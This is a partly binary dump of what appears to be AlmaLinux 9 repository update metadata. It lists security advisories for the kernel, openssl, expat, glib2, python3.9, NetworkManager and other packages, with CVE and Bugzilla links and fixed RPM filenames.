krb5-libs-1.21.1-2.el9_4.i686.rpm�p�krb5-workstation-1.21.1-2.el9_4.x86_64.rpm�&�krb5-server-1.21.1-2.el9_4.x86_64.rpm�(�libkadm5-1.21.1-2.el9_4.i686.rpm�&�krb5-server-1.21.1-2.el9_4.i686.rpm�$�krb5-libs-1.21.1-2.el9_4.x86_64.rpm�'�krb5-server-ldap-1.21.1-2.el9_4.x86_64.rpm�%�krb5-pkinit-1.21.1-2.el9_4.i686.rpm�(�libkadm5-1.21.1-2.el9_4.x86_64.rpm�%�krb5-pkinit-1.21.1-2.el9_4.x86_64.rpm�'�krb5-server-ldap-1.21.1-2.el9_4.i686.rpm��� �h
�1�{securityImportant: bubblewrap and flatpak security update,'��K�Jhttps://access.redhat.com/errata/RHSA-2024:6356RHSA-2024:6356RHSA-2024:6356https://access.redhat.com/security/cve/CVE-2024-42472CVE-2024-42472CVE-2024-42472https://bugzilla.redhat.com/23052022305202https://errata.almalinux.org/9/ALSA-2024-6356.htmlALSA-2024:6356ALSA-2024:6356�]�bubblewrap-0.4.1-7.el9_4.alma.1.x86_64.rpm�]�bubblewrap-0.4.1-7.el9_4.alma.1.x86_64.rpm���`�i
�2�}BsecurityModerate: glib2 security update,���
https://access.redhat.com/errata/RHSA-2024:6464RHSA-2024:6464RHSA-2024:6464https://access.redhat.com/security/cve/CVE-2024-34397CVE-2024-34397CVE-2024-34397https://bugzilla.redhat.com/22796322279632https://errata.almalinux.org/9/ALSA-2024-6464.htmlALSA-2024:6464ALSA-2024:6464�X�}glib2-2.68.4-14.el9_4.1.x86_64.rpm�X�}glib2-2.68.4-14.el9_4.1.i686.rpm�X�}glib2-2.68.4-14.el9_4.1.x86_64.rpm�X�}glib2-2.68.4-14.el9_4.1.i686.rpm����0�j
�3�@BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��"�l8https://access.redhat.com/errata/RHSA-2024:6567RHSA-2024:6567RHSA-2024:6567https://access.redhat.com/security/cve/CVE-2023-52463CVE-2023-52463CVE-2023-52463https://access.redhat.com/security/cve/CVE-2023-52801CVE-2023-52801CVE-2023-52801https://access.redhat.com/security/cve/CVE-2024-26629CVE-2024-26629CVE-2024-26629https://access.redhat.com/security/cve/CVE-2024-26630CVE-2024-26630CVE-2024-26630https://access.redhat.com/security/cve/CVE-2024-26720CVE-2024-26720CVE-2024-26720https://access.redhat.com/security/cve/CVE-2024-26886CVE-2024-26886CVE-2024-26886https://access.redhat.com/security/cve/CVE-2024-26946CVE-2024-26946CVE-2024-26946https://access.redhat.com/security/cve/CVE-2024-35791CVE-2024-35791CVE-2024-35791https://access.redhat.com/security/cve/CVE-2024-35797CVE-2024-35797CVE-2024-35797https://access.redhat.com/security/cve/CVE-2024-35875CVE-2024-35875CVE-2024-35875https://access.redhat.com/security/cve/CVE-2024-36000CVE-2024-36000CVE-2024-36000https://access.redhat.com/security/cve/CVE-2024-36019CVE-2024-36019CVE-2024-36019https://access.redhat.com/security/cve/CVE-2024-36883CVE-2024-36883CVE-2024-36883https://access.redhat.com/security/cve/CVE-2024-36979CVE-2024-36979CVE-2024-36979https://access.redhat.com/security/cve/CVE-2024-38559CVE-2024-38559CVE-2024-38559https://access.redhat.com/security/cve/CVE-2024-38619CVE-2024-38619CVE-2024-38619https://access.redhat.com/security/cve/CVE-2024-40927CVE-2024-40927CVE-2024-40927https://access.redhat.com/security/cve/CVE-2024-40936CVE-2024-40936CVE-2024-40936https://access.redhat.com/security/cve/CVE-2024-41040CVE-2024-41040CVE-2024-41040https://access.redhat.com/security/cve/CVE-2024-41044CVE-2024-41044CVE-2024-41044https://access.redhat.com/security/cve/CVE-2024-41055CVE-2024-41055CVE-2024-41055https://access.redhat.com/security/cve/CVE-2024-41073CVE-2024-41073CVE-2024-41073https://access.redhat.com/security/cve/CVE-2024-41096CVE-2024-41096CVE-2024-41096https://access.redhat.com/security/cve/CVE-2024-42082CVE-2024-42082CVE-2024-42082https://access.redhat.com/security/cve/CVE-2024-42096CVE-2024-42096CVE-2024-42096https://access.redhat.com/security/cve/CVE-2024-42102CVE-2024-42102CVE-2024-42102https://access.redhat.com/security/cve/CVE-2024-42131CVE-2024-42131CVE-2024-42131https://bugzilla.redhat.com/22657972265797https://bugzilla.redhat.com/22694342269434https://bugzilla.redhat.com/22694362269436https://bugzilla.redhat.com/22731412273141https://bugzilla.redhat.com/22756782275678https://bugzilla.redhat.com/22782062278206https://bugzilla.redhat.com/22810522281052https://bugzilla.redhat.com/22811512281151https://bugzilla.redhat.com/22817272281727https://bugzilla.redhat.com/22819682281968https://bugzilla.redhat.com/22827092282709https://bugzilla.redhat.com/22842712284271https://bugzilla.redhat.com/22844022284402https://bugzilla.redhat.com/22932732293273https://bugzilla.redhat.com/22932762293276https://bugzilla.redhat.com/22934402293440https://bugzilla.redhat.com/22975112297511https://bugzilla.redhat.com/22975202297520https://bugzilla.redhat.com/23004092300409https://bugzilla.redhat.com/23004142300414https://bugzilla.redhat.com/23004292300429https://bugzilla.redhat.com/23004912300491https://bugzilla.redhat.com/23005202300520https://bugzilla.redhat.com/23007132300713https://bugzilla.redhat.com/23014652301465https://bugzilla.redhat.com/23014962301496https://bugzilla.redhat.com/23016372301637https://errata.almalinux.org/9/ALSA-2024-6567.htmlALSA-2024:6567ALSA-2024:6567Lkernel-tools-5.14.0-427.35.1.el9_4.x86_64.rpm Lkernel-debug-uki-virt-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-modules-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-modules-extra-5.14.0-427.35.1.el9_4.x86_64.rpm2Lpython3-perf-5.14.0-427.35.1.el9_4.x86_64.rpm1�Fbpftool-7.3.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-extra-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-5.14.0-427.35.1.el9_4.x86_64.rpm!Lkernel-modules-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-core-5.14.0-427.35.1.el9_4.x86_64.rpm"Lkernel-uki-virt-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-abi-stablelists-5.14.0-427.35.1.el9_4.noarch.rpmLkernel-tools-libs-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-tools-5.14.0-427.35.1.el9_4.x86_64.rpm Lkernel-debug-uki-virt-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-modules-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-modules-extra-5.14.0-427.35.1.el9_4.x86_64.rpm2Lpython3-perf-5.14.0-427.35.1.el9_4.x86_64.rpm1�Fbpftool-7.3.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-extra-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-5.14.0-427.35.1.el9_4.x86_64.rpm!Lkernel-modules-core-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-core-5.14.0-427.35.1.el9_4.x86_64.rpm"Lkernel-uki-virt-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-abi-stablelists-5.14.0-427.35.1.el9_4.noarch.rpmLkernel-tools-libs-5.14.0-427.35.1.el9_4.x86_64.rpmLkernel-debug-modules-5.14.0-427.35.1.el9_4.x86_64.rpm����Y�k
�4�aBsecurityModerate: expat security update,���;https://access.redhat.com/errata/RHSA-2024:6754RHSA-2024:6754RHSA-2024:6754https://access.redhat.com/security/cve/CVE-2024-45490CVE-2024-45490CVE-2024-45490https://access.redhat.com/security/cve/CVE-2024-45491CVE-2024-45491CVE-2024-45491https://access.redhat.com/security/cve/CVE-2024-45492CVE-2024-45492CVE-2024-45492https://bugzilla.redhat.com/23086152308615https://bugzilla.redhat.com/23086162308616https://bugzilla.redhat.com/23086172308617https://errata.almalinux.org/9/ALSA-2024-6754.htmlALSA-2024:6754ALSA-2024:6754�"�wexpat-2.5.0-2.el9_4.1.i686.rpm�"�wexpat-2.5.0-2.el9_4.1.x86_64.rpm�"�wexpat-2.5.0-2.el9_4.1.i686.rpm�"�wexpat-2.5.0-2.el9_4.1.x86_64.rpm����1�l
�5�dBBBsecurityModerate: openssl security update,��I�Phttps://access.redhat.com/errata/RHSA-2024:6783RHSA-2024:6783RHSA-2024:6783https://access.redhat.com/security/cve/CVE-2024-6119CVE-2024-6119CVE-2024-6119https://bugzilla.redhat.com/23061582306158https://errata.almalinux.org/9/ALSA-2024-6783.htmlALSA-2024:6783ALSA-2024:6783��xopenssl-libs-3.0.7-28.el9_4.i686.rpm�:�xopenssl-3.0.7-28.el9_4.x86_64.rpm��xopenssl-libs-3.0.7-28.el9_4.x86_64.rpm��xopenssl-libs-3.0.7-28.el9_4.i686.rpm�:�xopenssl-3.0.7-28.el9_4.x86_64.rpm��xopenssl-libs-3.0.7-28.el9_4.x86_64.rpm����Q�m
�6�iBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityImportant: kernel security update,'���+https://access.redhat.com/errata/RHSA-2024:6997RHSA-2024:6997RHSA-2024:6997https://access.redhat.com/security/cve/CVE-2023-52439CVE-2023-52439CVE-2023-52439https://access.redhat.com/security/cve/CVE-2023-52884CVE-2023-52884CVE-2023-52884https://access.redhat.com/security/cve/CVE-2024-26739CVE-2024-26739CVE-2024-26739https://access.redhat.com/security/cve/CVE-2024-26929CVE-2024-26929CVE-2024-26929https://access.redhat.com/security/cve/CVE-2024-26930CVE-2024-26930CVE-2024-26930https://access.redhat.com/security/cve/CVE-2024-26931CVE-2024-26931CVE-2024-26931https://access.redhat.com/security/cve/CVE-2024-26947CVE-2024-26947CVE-2024-26947https://access.redhat.com/security/cve/CVE-2024-26991CVE-2024-26991CVE-2024-26991https://access.redhat.com/security/cve/CVE-2024-27022CVE-2024-27022CVE-2024-27022https://access.redhat.com/security/cve/CVE-2024-35895CVE-2024-35895CVE-2024-35895https://access.redhat.com/security/cve/CVE-2024-36016CVE-2024-36016CVE-2024-36016https://access.redhat.com/security/cve/CVE-2024-36899CVE-2024-36899CVE-2024-36899https://access.redhat.com/security/cve/CVE-2024-38562CVE-2024-38562CVE-2024-38562https://access.redhat.com/security/cve/CVE-2024-38570CVE-2024-38570CVE-2024-38570https://access.redhat.com/security/cve/CVE-2024-38573CVE-2024-38573CVE-2024-38573https://access.redhat.com/security/cve/CVE-2024-38601CVE-2024-38601CVE-2024-38601https://access.redhat.com/security/cve/CVE-2024-38615CVE-2024-38615CVE-2024-38615https://access.redhat.com/security/cve/CVE-2024-40984CVE-2024-40984CVE-2024-40984https://access.redhat.com/security/cve/CVE-2024-41071CVE-2024-41071CVE-2024-41071https://access.redhat.com/security/cve/CVE-2024-42225CVE-2024-42225CVE-2024-42225https://access.redhat.com/security/cve/CVE-2024-42246CVE-2024-42246CVE-2024-42246https://bugzilla.redhat.com/22652712265271https://bugzilla.redhat.com/22732702273270https://bugzilla.redhat.com/22781672278167https://bugzilla.redhat.com/22782452278245https://bugzilla.redhat.com/22782482278248https://bugzilla.redhat.com/22782502278250https://bugzilla.redhat.com/22782522278252https://bugzilla.redhat.com/22783182278318https://bugzilla.redhat.com/22816772281677https://bugzilla.redhat.com/22838942283894https://bugzilla.redhat.com/22845492284549https://bugzilla.redhat.com/22933482293348https://bugzilla.redhat.com/22933642293364https://bugzilla.redhat.com/22934202293420https://bugzilla.redhat.com/22934232293423https://bugzilla.redhat.com/22934312293431https://bugzilla.redhat.com/22936852293685https://bugzilla.redhat.com/22975682297568https://bugzilla.redhat.com/23004482300448https://bugzilla.redhat.com/23015432301543https://errata.almalinux.org/9/ALSA-2024-6997.htmlALSA-2024:6997ALSA-2024:6997Mkernel-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-tools-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-extra-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-5.14.0-427.37.1.el9_4.x86_64.rpm"Mkernel-uki-virt-5.14.0-427.37.1.el9_4.x86_64.rpm!Mkernel-modules-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-tools-libs-5.14.0-427.37.1.el9_4.x86_64.rpm2Mpython3-perf-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-modules-extra-5.14.0-427.37.1.el9_4.x86_64.rpm1�Gbpftool-7.3.0-427.37.1.el9_4.x86_64.rpm Mkernel-debug-uki-virt-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-modules-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-abi-stablelists-5.14.0-427.37.1.el9_4.noarch.rpmMkernel-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-tools-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-modules-extra-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-debug-5.14.0-427.37.1.el9_4.x86_64.rpm"Mkernel-uki-virt-5.14.0-427.37.1.el9_4.x86_64.rpm!Mkernel-modules-core-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-tools-libs-5.14.0-427.37.1.el9_4.x86_64.rpm2Mpython3-perf-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-modules-extra-5.14.0-427.37.1.el9_4.x86_64.rpm1�Gbpftool-7.3.0-427.37.1.el9_4.x86_64.rpm Mkernel-debug-uki-virt-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-modules-5.14.0-427.37.1.el9_4.x86_64.rpmMkernel-abi-stablelists-5.14.0-427.37.1.el9_4.noarch.rpm����	�n
��JBBBBBBBBBBBBBBBsecurityModerate: linux-firmware security update,��.�*https://access.redhat.com/errata/RHSA-2024:7484RHSA-2024:7484RHSA-2024:7484https://access.redhat.com/security/cve/CVE-2023-20584CVE-2023-20584CVE-2023-20584https://access.redhat.com/security/cve/CVE-2023-31356CVE-2023-31356CVE-2023-31356https://bugzilla.redhat.com/23045832304583https://bugzilla.redhat.com/23045932304593https://errata.almalinux.org/9/ALSA-2024-7484.htmlALSA-2024:7484ALSA-2024:7484�h�ciwl6000g2a-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�c�ciwl2000-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�a�ciwl105-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�k�Niwl7260-firmware-25.30.13.0-143.3.el9_4.noarch.rpm�`�iwl1000-firmware-39.31.5.1-143.3.el9_4.noarch.rpm�e�Niwl3160-firmware-25.30.13.0-143.3.el9_4.noarch.rpm�f�$iwl5000-firmware-8.83.5.1_1-143.3.el9_4.noarch.rpm�n�^linux-firmware-whence-20240905-143.3.el9_4.noarch.rpm�g� iwl5150-firmware-8.24.2.2-143.3.el9_4.noarch.rpm�d�ciwl2030-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�j�iwl6050-firmware-41.28.5.1-143.3.el9_4.noarch.rpm�l�^libertas-sd8787-firmware-20240905-143.3.el9_4.noarch.rpm�i�ciwl6000g2b-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�o�^netronome-firmware-20240905-143.3.el9_4.noarch.rpm�m�^linux-firmware-20240905-143.3.el9_4.noarch.rpm�_�iwl100-firmware-39.31.5.1-143.3.el9_4.noarch.rpm�b�ciwl135-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�h�ciwl6000g2a-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�c�ciwl2000-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�a�ciwl105-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�k�Niwl7260-firmware-25.30.13.0-143.3.el9_4.noarch.rpm�`�iwl1000-firmware-39.31.5.1-143.3.el9_4.noarch.rpm�e�Niwl3160-firmware-25.30.13.0-143.3.el9_4.noarch.rpm�f�$iwl5000-firmware-8.83.5.1_1-143.3.el9_4.noarch.rpm�n�^linux-firmware-whence-20240905-143.3.el9_4.noarch.rpm�g� iwl5150-firmware-8.24.2.2-143.3.el9_4.noarch.rpm�d�ciwl2030-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�j�iwl6050-firmware-41.28.5.1-143.3.el9_4.noarch.rpm�l�^libertas-sd8787-firmware-20240905-143.3.el9_4.noarch.rpm�i�ciwl6000g2b-firmware-18.168.6.1-143.3.el9_4.noarch.rpm�o�^netronome-firmware-20240905-143.3.el9_4.noarch.rpm�m�^linux-firmware-20240905-143.3.el9_4.noarch.rpm�_�iwl100-firmware-39.31.5.1-143.3.el9_4.noarch.rpm�b�ciwl135-firmware-18.168.6.1-143.3.el9_4.noarch.rpm����y�o
�7�\BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��X�<https://access.redhat.com/errata/RHSA-2024:8162RHSA-2024:8162RHSA-2024:8162https://access.redhat.com/security/cve/CVE-2021-47385CVE-2021-47385CVE-2021-47385https://access.redhat.com/security/cve/CVE-2023-28746CVE-2023-28746CVE-2023-28746https://access.redhat.com/security/cve/CVE-2023-52658CVE-2023-52658CVE-2023-52658https://access.redhat.com/security/cve/CVE-2024-27403CVE-2024-27403CVE-2024-27403https://access.redhat.com/security/cve/CVE-2024-35989CVE-2024-35989CVE-2024-35989https://access.redhat.com/security/cve/CVE-2024-36889CVE-2024-36889CVE-2024-36889https://access.redhat.com/security/cve/CVE-2024-36978CVE-2024-36978CVE-2024-36978https://access.redhat.com/security/cve/CVE-2024-38556CVE-2024-38556CVE-2024-38556https://access.redhat.com/security/cve/CVE-2024-39483CVE-2024-39483CVE-2024-39483https://access.redhat.com/security/cve/CVE-2024-39502CVE-2024-39502CVE-2024-39502https://access.redhat.com/security/cve/CVE-2024-40959CVE-2024-40959CVE-2024-40959https://access.redhat.com/security/cve/CVE-2024-42079CVE-2024-42079CVE-2024-42079https://access.redhat.com/security/cve/CVE-2024-42272CVE-2024-42272CVE-2024-42272https://access.redhat.com/security/cve/CVE-2024-42284CVE-2024-42284CVE-2024-42284https://bugzilla.redhat.com/22707002270700https://bugzilla.redhat.com/22811272281127https://bugzilla.redhat.com/22811492281149https://bugzilla.redhat.com/22818472281847https://bugzilla.redhat.com/22823552282355https://bugzilla.redhat.com/22845712284571https://bugzilla.redhat.com/22930782293078https://bugzilla.redhat.com/22934432293443https://bugzilla.redhat.com/22959212295921https://bugzilla.redhat.com/22974742297474https://bugzilla.redhat.com/22975432297543https://bugzilla.redhat.com/23005172300517https://errata.almalinux.org/9/ALSA-2024-8162.htmlALSA-2024:8162ALSA-2024:8162"Nkernel-uki-virt-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-5.14.0-427.40.1.el9_4.x86_64.rpm2Npython3-perf-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-5.14.0-427.40.1.el9_4.x86_64.rpm!Nkernel-modules-core-5.14.0-427.40.1.el9_4.x86_64.rpm1�Hbpftool-7.3.0-427.40.1.el9_4.x86_64.rpmNkernel-modules-5.14.0-427.40.1.el9_4.x86_64.rpm Nkernel-debug-uki-virt-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-modules-extra-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-tools-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-extra-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-abi-stablelists-5.14.0-427.40.1.el9_4.noarch.rpmNkernel-debug-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-tools-libs-5.14.0-427.40.1.el9_4.x86_64.rpm"Nkernel-uki-virt-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-5.14.0-427.40.1.el9_4.x86_64.rpm2Npython3-perf-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-5.14.0-427.40.1.el9_4.x86_64.rpm!Nkernel-modules-core-5.14.0-427.40.1.el9_4.x86_64.rpm1�Hbpftool-7.3.0-427.40.1.el9_4.x86_64.rpmNkernel-modules-5.14.0-427.40.1.el9_4.x86_64.rpm Nkernel-debug-uki-virt-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-modules-extra-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-tools-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-debug-modules-extra-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-abi-stablelists-5.14.0-427.40.1.el9_4.noarch.rpmNkernel-debug-core-5.14.0-427.40.1.el9_4.x86_64.rpmNkernel-tools-libs-5.14.0-427.40.1.el9_4.x86_64.rpm���	�p
�8�}BBBsecurityModerate: python3.9 security update,���\https://access.redhat.com/errata/RHSA-2024:8446RHSA-2024:8446RHSA-2024:8446https://access.redhat.com/security/cve/CVE-2024-6232CVE-2024-6232CVE-2024-6232https://bugzilla.redhat.com/23094262309426https://errata.almalinux.org/9/ALSA-2024-8446.htmlALSA-2024:8446ALSA-2024:8446��python3-3.9.18-3.el9_4.6.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.6.i686.rpm-�python3-libs-3.9.18-3.el9_4.6.x86_64.rpm��python3-3.9.18-3.el9_4.6.x86_64.rpm-�python3-libs-3.9.18-3.el9_4.6.i686.rpm-�python3-libs-3.9.18-3.el9_4.6.x86_64.rpm����q
�9�BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBsecurityModerate: kernel security update,��p�>-https://access.redhat.com/errata/RHSA-2024:8617RHSA-2024:8617RHSA-2024:8617https://access.redhat.com/security/cve/CVE-2021-47383CVE-2021-47383CVE-2021-47383https://access.redhat.com/security/cve/CVE-2024-2201CVE-2024-2201CVE-2024-2201https://access.redhat.com/security/cve/CVE-2024-26640CVE-2024-26640CVE-2024-26640https://access.redhat.com/security/cve/CVE-2024-26826CVE-2024-26826CVE-2024-26826https://access.redhat.com/security/cve/CVE-2024-26923CVE-2024-26923CVE-2024-26923https://access.redhat.com/security/cve/CVE-2024-26935CVE-2024-26935CVE-2024-26935https://access.redhat.com/security/cve/CVE-2024-26961CVE-2024-26961CVE-2024-26961https://access.redhat.com/security/cve/CVE-2024-36244CVE-2024-36244CVE-2024-36244https://access.redhat.com/security/cve/CVE-2024-39472CVE-2024-39472CVE-2024-39472https://access.redhat.com/security/cve/CVE-2024-39504CVE-2024-39504CVE-2024-39504https://access.redhat.com/security/cve/CVE-2024-40904CVE-2024-40904CVE-2024-40904https://access.redhat.com/security/cve/CVE-2024-40931CVE-2024-40931CVE-2024-40931https://access.redhat.com/security/cve/CVE-2024-40960CVE-2024-40960CVE-2024-40960https://access.redhat.com/security/cve/CVE-2024-40972CVE-2024-40972CVE-2024-40972https://access.redhat.com/security/cve/CVE-2024-40977CVE-2024-40977CVE-2024-40977https://access.redhat.com/security/cve/CVE-2024-40995CVE-2024-40995CVE-2024-40995https://access.redhat.com/security/cve/CVE-2024-40998CVE-2024-40998CVE-2024-40998https://access.redhat.com/security/cve/CVE-2024-41005CVE-2024-41005CVE-2024-41005https://access.redhat.com/security/cve/CVE-2024-41013CVE-2024-41013CVE-2024-41013https://access.redhat.com/security/cve/CVE-2024-41014CVE-2024-41014CVE-2024-41014https://access.redhat.com/security/cve/CVE-2024-43854CVE-2024-43854CVE-2024-43854https://access.redhat.com/security/cve/CVE-2024-45018CVE-2024-45018CVE-2024-45018https://bugzilla.redhat.com/22681182268118https://bugzilla.redhat.com/22701002270100https://bugzilla.redhat.com/22756042275604https://bugzilla.redhat.com/22771712277171https://bugzilla.redhat.com/22781762278176https://bugzilla.redhat.com/22782352278235https://bugzilla.redhat.com/22823572282357https://bugzilla.redhat.com/22936542293654https://bugzilla.redhat.com/22960672296067https://bugzilla.redhat.com/22974762297476https://bugzilla.redhat.com/22974882297488https://bugzilla.redhat.com/22975152297515https://bugzilla.redhat.com/22975442297544https://bugzilla.redhat.com/22975562297556https://bugzilla.redhat.com/22975612297561https://bugzilla.redhat.com/22975792297579https://bugzilla.redhat.com/22975822297582https://bugzilla.redhat.com/22975892297589https://bugzilla.redhat.com/23002962300296https://bugzilla.redhat.com/23002972300297https://bugzilla.redhat.com/23117152311715https://errata.almalinux.org/9/ALSA-2024-8617.htmlALSA-2024:8617ALSA-2024:8617Okernel-debug-5.14.0-427.42.1.el9_4.x86_64.rpm2Opython3-perf-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-abi-stablelists-5.14.0-427.42.1.el9_4.noarch.rpm!Okernel-modules-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-tools-libs-5.14.0-427.42.1.el9_4.x86_64.rpm"Okernel-uki-virt-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-tools-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-modules-5.14.0-427.42.1.el9_4.x86_64.rpm Okernel-debug-uki-virt-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-core-5.14.0-427.42.1.el9_4.x86_64.rpm1�Ibpftool-7.3.0-427.42.1.el9_4.x86_64.rpmOkernel-modules-extra-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-extra-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-5.14.0-427.42.1.el9_4.x86_64.rpm2Opython3-perf-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-abi-stablelists-5.14.0-427.42.1.el9_4.noarch.rpm!Okernel-modules-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-tools-libs-5.14.0-427.42.1.el9_4.x86_64.rpm"Okernel-uki-virt-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-core-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-tools-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-modules-5.14.0-427.42.1.el9_4.x86_64.rpm Okernel-debug-uki-virt-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-core-5.14.0-427.42.1.el9_4.x86_64.rpm1�Ibpftool-7.3.0-427.42.1.el9_4.x86_64.rpmOkernel-modules-extra-5.14.0-427.42.1.el9_4.x86_64.rpmOkernel-debug-modules-extra-5.14.0-427.42.1.el9_4.x86_64.rpm����E�r
�:�cBBBBBBBBBBBBBBBBBsecurityLow: NetworkManager security update,�9��.�jhttps://access.redhat.com/errata/RHSA-2024:9317RHSA-2024:9317RHSA-2024:9317https://access.redhat.com/security/cve/CVE-2024-6501CVE-2024-6501CVE-2024-6501https://bugzilla.redhat.com/22957342295734https://errata.almalinux.org/9/ALSA-2024-9317.htmlALSA-2024:9317ALSA-2024:9317�W�NetworkManager-initscripts-updown-1.48.10-2.el9_5.alma.1.noarch.rpm�[�NetworkManager-wwan-1.48.10-2.el9_5.alma.1.x86_64.rpm�U�NetworkManager-bluetooth-1.48.10-2.el9_5.alma.1.x86_64.rpm�V�NetworkManager-config-server-1.48.10-2.el9_5.alma.1.noarch.rpm�Z�NetworkManager-wifi-1.48.10-2.el9_5.alma.1.x86_64.rpm�%�NetworkManager-libnm-1.48.10-2.el9_5.alma.1.x86_64.rpm�S�NetworkManager-1.48.10-2.el9_5.alma.1.x86_64.rpm�%�NetworkManager-libnm-1.48.10-2.el9_5.alma.1.i686.rpm�T�NetworkManager-adsl-1.48.10-2.el9_5.alma.1.x86_64.rpm�X�NetworkManager-team-1.48.10-2.el9_5.alma.1.x86_64.rpm�Y�NetworkManager-tui-1.48.10-2.el9_5.alma.1.x86_64.rpm�W�NetworkManager-initscripts-updown-1.48.10-2.el9_5.alma.1.noarch.rpm�[�NetworkManager-wwan-1.48.10-2.el9_5.alma.1.x86_64.rpm�U�NetworkManager-bluetooth-1.48.10-2.el9_5.alma.1.x86_64.rpm�V�NetworkManager-config-server-1.48.10-2.el9_5.alma.1.noarch.rpm�Z�NetworkManager-wifi-1.48.10-2.el9_5.alma.1.x86_64.rpm�%�NetworkManager-libnm-1.48.10-2.el9_5.alma.1.x86_64.rpm�S�NetworkManager-1.48.10-2.el9_5.alma.1.x86_64.rpm�%�